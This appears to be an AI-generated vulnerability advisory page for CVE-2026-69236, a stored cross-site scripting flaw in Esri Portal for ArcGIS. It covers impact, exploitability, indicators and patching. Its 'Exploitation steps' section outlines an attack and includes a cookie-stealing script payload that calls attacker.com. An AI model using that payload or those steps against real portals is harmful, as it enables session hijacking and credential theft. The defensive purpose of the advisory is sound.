CVE-2026-69236
Portal for ArcGIS vulnerability analysis and mitigation

Overview

CVE-2026-69236 is a stored cross-site scripting (XSS) vulnerability in Esri Portal for ArcGIS that may allow a remote attacker to inject malicious code and execute arbitrary JavaScript in a victim's browser. It affects Portal for ArcGIS versions 11.1 through 12.1 (inclusive), running on both Windows and Linux platforms. The vulnerability was published on August 21, 2026, by Esri (Environmental Systems Research Institute, Inc.) as part of their August 2026 ArcGIS Security Bulletin. It carries a CVSS v3.1 base score of 6.1 (Medium) (GitHub Advisory, Feedly).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically of the stored (persistent) XSS variant. An attacker with network access can inject malicious script content into Portal for ArcGIS that is subsequently stored and rendered to other users' browsers without proper sanitization or output encoding. Exploitation requires user interaction (a victim must view the affected content), but no authentication is required on the attacker's side to submit the malicious payload. No public proof-of-concept or detailed technical write-up has been identified at this time (GitHub Advisory, Feedly).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of users who view the affected portal content, enabling session hijacking, credential theft, phishing, or malware distribution. Because the injected script executes in the context of the victim's authenticated session, attackers could potentially access sensitive geospatial data, impersonate users, or perform unauthorized actions within the ArcGIS Enterprise environment. Availability is not directly impacted, but confidentiality and integrity are both affected at a low level per the CVSS assessment (Feedly, GitHub Advisory).

Exploitability

There is no known public proof-of-concept exploit and no evidence of active in-the-wild exploitation as of the time of publication. The vulnerability has not been added to the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.177% (8th percentile), indicating a low near-term probability of exploitation (GitHub Advisory, Feedly).

Exploitation steps

  1. Reconnaissance: Identify publicly accessible Esri Portal for ArcGIS instances running versions 11.1 through 12.1 using tools like Shodan or Censys, or by browsing to known ArcGIS Enterprise portal URLs.
  2. Identify injectable input fields: Locate portal features that accept and store user-supplied content (e.g., item descriptions, group summaries, map titles, or other metadata fields) that are rendered to other users.
  3. Inject malicious payload: Submit a crafted stored XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable input field that persists in the portal.
  4. Trigger victim execution: Wait for or socially engineer an authenticated portal user (e.g., an administrator or data consumer) to view the page or item containing the injected script.
  5. Harvest results: The victim's browser executes the injected JavaScript, potentially sending session cookies, tokens, or other sensitive data to an attacker-controlled server, enabling session hijacking or further attacks (Feedly).

Indicators of compromise

  • Network: Unexpected outbound HTTP/HTTPS requests from users' browsers to unknown external domains shortly after accessing ArcGIS Portal content; unusual GET requests to attacker-controlled URLs containing encoded cookie or session data.
  • Logs: ArcGIS Portal access logs showing submission of content containing <script>, javascript:, onerror=, or other XSS-indicative strings in item metadata or description fields; repeated access to specific portal items by multiple users followed by anomalous external connections.
  • File System: No direct file system artifacts expected for a browser-side XSS attack, but server-side logs may capture the stored malicious payload in database or audit logs.
  • Process/Browser: Unexpected JavaScript execution errors or network requests in browser developer tools when viewing specific portal items or pages (Feedly).

Mitigation and workarounds

Esri recommends that all users of ArcGIS Enterprise versions 11.1, 11.3, 11.5, 12.0, and 12.1 apply the available patch immediately, and that all users upgrade to the latest long-term support release. The patch details and download instructions are provided in the August 2026 ArcGIS Security Bulletin. As interim mitigations, administrators should consider implementing Content Security Policy (CSP) headers and enforcing strict input validation and output encoding within the portal environment (Esri Security Bulletin, Feedly).

Additional resources


SourceThis report was generated using AI

Related Portal for ArcGIS vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-69236MEDIUM6.1
  • Portal for ArcGIS logoPortal for ArcGIS
  • cpe:2.3:a:esri:portal_for_arcgis
NoNoAug 21, 2026
CVE-2026-69235MEDIUM6.1
  • Portal for ArcGIS logoPortal for ArcGIS
  • cpe:2.3:a:esri:portal_for_arcgis
NoNoAug 21, 2026
CVE-2026-69234MEDIUM6.1
  • Portal for ArcGIS logoPortal for ArcGIS
  • cpe:2.3:a:esri:portal_for_arcgis
NoNoAug 21, 2026
CVE-2026-69237LOW3.8
  • Portal for ArcGIS logoPortal for ArcGIS
  • cpe:2.3:a:esri:portal_for_arcgis
NoNoAug 21, 2026
CVE-2026-69238LOW3.5
  • Portal for ArcGIS logoPortal for ArcGIS
  • cpe:2.3:a:esri:portal_for_arcgis
NoNoAug 21, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management